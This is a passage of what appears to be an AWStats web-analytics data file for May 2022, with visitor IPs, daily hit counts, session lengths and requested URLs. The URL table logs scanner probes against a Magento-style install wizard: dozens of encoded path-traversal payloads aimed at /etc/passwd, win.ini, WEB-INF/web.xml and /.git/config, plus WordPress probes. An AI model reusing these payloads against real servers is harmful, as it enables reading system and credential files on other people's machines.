185.220.101.55 1 1 992 20220515112433
36.110.211.3 2 2 13602 20220517065317
35.233.62.116 3 3 2976 20220531191604
71.6.135.131 1 1 992 20220529070409
35.84.207.229 1 1 992 20220501224631
213.149.103.132 1 1 12292 20220516221855
94.183.166.168 1 1 12286 20220526003605
2.57.122.19 3 3 2976 20220521084555
167.248.133.117 1 1 992 20220523185337
42.236.10.90 1 1 12609 20220517051713
167.94.138.47 2 2 1984 20220530013357
185.220.101.40 1 1 992 20220507234503
185.163.109.66 1 1 992 20220512173300
54.80.1.226 1 1 992 20220512032949
18.157.161.219 1 1 0 20220516143229
END_VISITOR
# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20220501 11 11 56099 8
20220502 21 21 54836 20
20220503 16 16 90437 16
20220504 23 23 45409 22
20220505 12 12 11904 12
20220506 58 58 1646057 20
20220507 20 20 42435 20
20220508 12 12 11904 12
20220509 19 19 18848 18
20220510 17 17 39466 16
20220511 18 18 28161 18
20220512 29 29 77315 25
20220513 62 62 1586777 21
20220514 3 3 1984 3
20220515 10 10 32497 9
20220516 18 18 39465 18
20220517 43 43 205194 39
20220518 31 31 121141 25
20220519 19 19 52838 18
20220520 20586 21505 125838161 19
20220521 23 23 22816 21
20220522 19 19 120633 13
20220523 19 19 52741 19
20220524 22 22 21824 21
20220525 21 21 66030 19
20220526 23 23 34110 22
20220527 22 22 44424 21
20220528 16 16 38472 16
20220529 58 58 1571516 18
20220530 35 35 777205 17
20220531 22 22 126864 19
END_DAY
# Session range - Number of visits
BEGIN_SESSION 7
0s-30s 548
2mn-5mn 2
1h+ 1
5mn-15mn 2
30mn-1h 9
15mn-30mn 1
30s-2mn 2
END_SESSION
# URL - Pages - Bandwidth - Entry - Exit
# The 25 first Pages must be first (order not required for others)
BEGIN_SIDER 368
/acc/index.php/install/wizard/config/ 9323 50459923 0 1
/ 913 1693335 519 513
/acc/index.php/install/ 708 11752092 0 0
/acc/js/mage/adminhtml/giftoptions/ 409 349248 0 0
/acc/js/prototype/windows/themes/ 408 1724052 0 0
/acc/skin/install/default/default/ 408 490435 0 0
/acc/index.php/install/wizard/locale/ 407 22684786 0 0
/acc/js/mage/adminhtml/ 406 2133135 0 0
/acc/js/mage/adminhtml/uploader/ 406 344655 0 0
/acc/js/mage/adminhtml/wysiwyg/ 406 414720 0 0
/acc/skin/adminhtml/default/ 406 338985 0 0
/acc/js/prototype/windows/ 406 408645 0 0
/acc/js/mage/adminhtml/sales/ 406 415125 0 0
/acc/js/mage/adminhtml/product/ 406 343440 0 0
/acc/skin/install/default/ 404 334893 0 0
/acc/skin/adminhtml/ 403 326022 0 0
/acc/js/mage/ 403 831336 0 0
/acc/skin/frontend/ 400 460446 0 0
/acc/js/prototype/ 400 1116003 0 0
/acc/skin/ 394 448413 0 0
/acc/skin/install/ 394 317151 0 0
/acc/skin/install/default/default/images/ 392 1662141 0 0
/acc/js/varien/ 392 1011908 0 0
/acc/js/scriptaculous/ 392 808197 0 0
/acc/skin/install/default/default/css/ 392 620517 0 0
/acc/index.php/install/wizard/locale/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd 1 16599 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 5339 0 0
/acc/index.php/install/wizard/config/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini 1 5305 0 0
/acc/index.php/install/wizard/locale/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/../WEB-INF/web.xml 1 56116 0 0
/acc/index.php/install/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/./WEB-INF/web.xml 1 5281 0 0
//cms/wp-includes/wlwmanifest.xml 7 267966 0 0
/acc/index.php/install/wizard/locale/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd 2 112232 0 0
/acc/index.php/install/wizard/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cwindows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/config/../../WEB-INF/web.xml 1 5277 0 0
/acc/index.php/install/wizard/locale/../../../../package-lock.json 1 56116 0 0
/acc/index.php/install/wizard/config/../../../WEB-INF/web.xml%C0%80.jsp 1 5294 0 0
/acc/index.php/install/wizard/locale/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/../../../web.config 1 56116 0 0
/acc/index.php/install/wizard/locale/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 3 168348 0 0
/acc/index.php/install/wizard/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini 1 16599 0 0
/acc/index.php/install/wizard/ 387 6423813 0 0
/acc/index.php/install/wizard/\\../\\../\\../\\../\\../\\../\\../\\../boot.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini 1 5289 0 0
/acc/index.php/install/wizard/../../../WEB-INF/web.xml 1 16599 0 0
/acc/index.php/install/wizard/locale/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd 1 16599 0 0
/acc/.gitignore 1 19 0 0
/.git/config 1 12291 1 1
/acc/index.php/install/wizard/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/../package-lock.json 1 5283 0 0
/acc/install/wizard/config/ 1 5262 0 0
/acc/index.php/install/wizard/config/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\etc/passwd 1 5279 0 0
/acc/index.php/install/wizard/locale/../../../../package.json 1 56116 0 0
/acc/index.php/install/wizard/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd 1 56116 0 0
/acc/index.php/install/wizard/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale 1 56116 0 0
/acc/index.php/install/wizard/config/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 5307 0 0
/acc/index.php/install/wizard/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd 1 5272 0 0
/acc/index.php/install/wizard/config/0s6wgrsclhsg.html 1 5262 0 0
//wordpress/wp-includes/wlwmanifest.xml 7 268008 0 0
//web/wp-includes/wlwmanifest.xml 7 267966 0 0
/acc/index.php/install/wizard/config/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd 1 5291 0 0
/acc/index.php/install/wizard/locale/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\etc/passwd 1 5273 0 0
/acc/index.php/install/wizard/locale/../../../../web.config 1 56116 0 0
/acc/index.php/install/wizard/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/../../../WEB-INF/web.xml 1 56116 0 0
/acc/index.php/install/wizard/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 56116 0 0
/wp-login.php 34 417901 34 34
/acc/index.php/install/wizard/config/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\etc/passwd 1 5323 0 0
/acc/index.php/install/wizard/config/\\../\\../\\../\\../\\../\\../\\../\\../boot.ini 1 5280 0 0
/acc/index.php/install/wizard/locale/zm7j091mkyee.html 1 56116 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd 1 5339 0 0
/acc/index.php/install/wizard/config/../../../WEB-INF/web.xml 1 5288 0 0
/acc/index.php/install/wizard/locale/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/windows/win.ini 1 5344 0 0
/acc/index.php/install/wizard/\\../\\../\\../\\../\\../\\../\\../\\../etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\windows/win.ini 1 5327 0 0
/acc/index.php/install/wizard/\\../\\../\\../\\../\\../\\../\\../\\../windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/1'\"1000 1 56116 0 0
/acc/index.php/install/wizard/config/\\../\\../\\../\\../\\../\\../\\../\\../etc/passwd 1 5275 0 0
/acc/index.php/install/wizard/config/./WEB-INF/web.xml%C0%80.jsp 1 5287 0 0
/acc/index.php/install/wizard/locale/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 56116 0 0
//2020/wp-includes/wlwmanifest.xml 1 38287 0 0
/acc/index.php/install/wizard/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/\\../\\../\\../\\../\\../\\../\\../\\../windows/win.ini 1 5279 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/../../WEB-INF/web.xml 1 16599 0 0
/acc/index.php/install/wizard/config/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd 1 5339 0 0
/acc/index.php/install/wizard/locale/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\windows/win.ini 1 5311 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 3 49797 0 0
/acc/index.php/install/wizard/config/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cwindows/win.ini 1 5311 0 0
/acc/index.php/install/wizard/..../..../..../..../..../..../..../..../etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/../../package.json 1 5268 0 0
/acc/index.php/install/wizard/config/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/WEB-INF/web.xml 1 5302 0 0
/acc/index.php/install/wizard/config/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd 2 10710 0 0
/acc/index.php/install/wizard/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 5285 0 0
/acc/index.php/install/wizard/config/0s6wgrsclhsg 1 5262 0 0
/acc/index.php/install/wizard/locale/\"918990%40 1 56116 0 0
//sito/wp-includes/wlwmanifest.xml 7 267973 0 5
/acc/index.php/install/wizard/locale/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini 1 56116 0 0
//wp1/wp-includes/wlwmanifest.xml 7 267966 0 0
/acc/index.php/install/wizard/config/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af/etc/passwd 1 5563 0 0
/acc/index.php/install/wizard/config/\"996404%40 1 5262 0 0
/acc/index.php/install/wizard/config/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini 1 5280 0 0
/acc/index.php/install/wizard/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/\\../\\../\\../\\../\\../\\../\\../\\../boot.ini 1 56116 0 0
/acc/install/ 1 16599 0 0
/acc/index.php/install/wizard/config/../../package-lock.json 1 5268 0 0
/acc/index.php/install/wizard/locale/../../package-lock.json 1 56116 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 1 5285 0 0
/acc/index.php/install/wizard/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/win.ini 1 16599 0 0
/acc/index.php/install/wizard/locale/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/../../WEB-INF/web.xml%C0%80.jsp 1 56116 0 0
/acc/index.php/install/wizard/../../WEB-INF/web.xml%C0%80.jsp 1 16599 0 0
/acc/index.php/install/wizard/config/%C0%AE%C0%AE/WEB-INF/web.xml 1 5284 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 5371 0 0
//2019/wp-includes/wlwmanifest.xml 7 267973 0 0
/acc/index.php/install/wizard/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/locale/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/config/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\/etc/passwd 1 5483 0 0
/acc/index.php/install/wizard/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/etc/passwd 1 16599 0 0
//media/wp-includes/wlwmanifest.xml 6 229692 0 0
/acc/index.php/install/wizard/config/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini 1 5319 0 0
/acc/index.php/install/wizard/config/.../.../.../.../.../.../.../.../windows/win.ini 1 5279 0 0
/acc/index.php/install/wizard/locale/../web.config 1 56116 0 0
* 78 0 0 0
/acc/index.php/install/wizard/locale/../package.json 1 56116 0 0
/acc/index.php/install/wizard/config/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows/win.ini 1 5343 0 0
/acc/index.php/install/wizard/locale/index/1'\"1000 1 56116 0 0
/acc/index.php/install/wizard/../WEB-INF/web.xml 1 16599 0 0
/sling/ 78 0 0 0
/acc/index.php/install/wizard/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows/win.ini 1 16599 0 0
//wp/wp-includes/wlwmanifest.xml 7 267959 0 0
//website/wp-includes/wlwmanifest.xml 7 267994 0 0
/acc/index.php/install/wizard/config/../../../package.json 1 5278 0 0
/acc/index.php/install/wizard/.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd 2 33198 0 0
/acc/index.php/install/wizard/locale/../../../WEB-INF/web.xml%C0%80.jsp 1 56116 0 0
/acc/index.php/install/wizard/locale/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd 1 56116 0 0
/acc/index.php/install/wizard/config/../../../../package-lock.json 1 5268 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd 1 56116 0 0
/acc/index.php/install/wizard/locale/zm7j091mkyee 1 56116 0 0
/acc/index.php/install/wizard/%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%afetc%c0%af%c0%af%c0%afpasswd 1 16599 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\windows/win.ini 1 16599 0 0
//2018/wp-includes/wlwmanifest.xml 6 229686 0 0
/acc/index.php/install/wizard/locale/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 56116 0 0
/acc/index.php/install/wizard/./WEB-INF/web.xml 1 16599 0 0
/acc/index.php/install/wizard/config/../WEB-INF/web.xml%C0%80.jsp 1 5288 0 0
/acc/index.php/install/wizard/locale/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/win.ini 1 56116 0 0
/acc/index.php/install/wizard/locale/./WEB-INF/web.xml%C0%80.jsp 1 56116 0 0
/acc/index.php/install/wizard/config/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/windows/win.ini 1 5328 0 0
/acc/index.php/install/wizard/config/../Gemfile 1 5273 0 0
/acc/index.php/install/wizard/.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c/etc/passwd 1 16599 0 0
/acc/index.php/install/wizard/config/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini 1 5303 0 0
/acc/index.php/install/wizard/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/etc/passwd 1 16599 0 0
//test/wp-includes/wlwmanifest.xml 7 267973 0 0
/acc/index.php/install/wizard/config/..\\..\\..\\..\\..\\..\\..\\..\\etc/passwd 2 10582 0 0
